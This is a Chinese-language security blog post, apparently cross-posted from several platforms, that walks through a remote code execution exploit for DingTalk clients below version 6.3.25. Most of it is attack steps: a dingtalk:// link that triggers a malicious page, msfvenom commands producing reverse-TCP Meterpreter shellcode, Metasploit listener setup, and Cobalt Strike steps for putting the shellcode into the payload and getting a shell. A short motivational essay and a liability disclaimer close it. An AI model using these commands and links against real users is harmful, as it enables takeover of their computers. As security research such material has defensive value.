我這一生如履薄冰，你說我能走到對岸嗎？

本文首發于SecIN社區，原創作者即是本人

前言

網絡安全技術學習，承認??的弱點不是丑事。只有對原理了然于?，才能突破更多的限制。擁有快速學習能力的白帽子，是不能有短板的，有的只能是大量的標準板和幾塊長板。知識?，決定看到的攻擊?有多?；知識鏈，決定發動的殺傷鏈有多深。

一、影響版本：

經測試需要釘釘版本< 6.3.25-Release.2149108

二、poc：

三、觸發方式

dingtalk://dingtalkclient/page/link?url=x.x.x.x/calc.html&pc_slide=true

漏洞證明：

四、msf反彈shell

msf 生成shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -e x86/shikata_ga_nai -f csharp

msf開啟監聽

use exploits/multi/handler
set lhost x.x.x.x
set lport xxx
run

將生成的shellcode替換原shellcode

需要替換的位置為

var shellcode=new Uint8Array()

poc:

dingtalk://dingtalkclient/page/link?url=http://x.x.x.x/msf.html&pc_slide=true

漏洞證明

五、cs反彈shell

cs生成c#的shellcode

不要勾選x64

將生成的shellcode替換原shellcode

需要替換的位置為

var shellcode=new Uint8Array()

poc:

dingtalk://dingtalkclient/page/link?url=http://x.x.x.x/cs.html&pc_slide=true

成功上線cs

網絡安全感悟

做網絡安全是一個長期的過程，因為做網絡安全沒有終點，不管是網絡安全企業，還是在網絡安全行業各種不同方向的從業人員，不管你選擇哪個方向，只有在這條路上堅持不懈，才能在這條路上走的更遠，走的更好，不然你肯定走不遠，遲早會轉行或者被淘汰，把時間全浪費掉。如果你覺得自己是真的熱愛網絡安全這個行業，堅持走下去就可以了，不用去管別人，現在就是一個大浪淘金的時代，淘下去的是沙子，留下來的才是金子，正所謂，千淘萬漉雖辛苦，吹盡狂沙始到金，網絡安全的路還很長，一生只做一件事，堅持做好一件事！

免責聲明：由于傳播或利用此文所提供的信息、技術或方法而造成的任何直接或間接的后果及損失，均由使用者本人負責， 文章作者不為此承擔任何責任。

轉載聲明：各家興 擁有對此文章的修改和解釋權，如欲轉載或傳播此文章，必須保證此文章的完整性，包括版權聲明等全部內容。未經作者允許，不得任意修改或者增減此文章的內容，不得以任何方式將其用于商業目的。

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog公眾號：
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect博客:
https://rdyx0.github.io/先知社區：
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf：
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85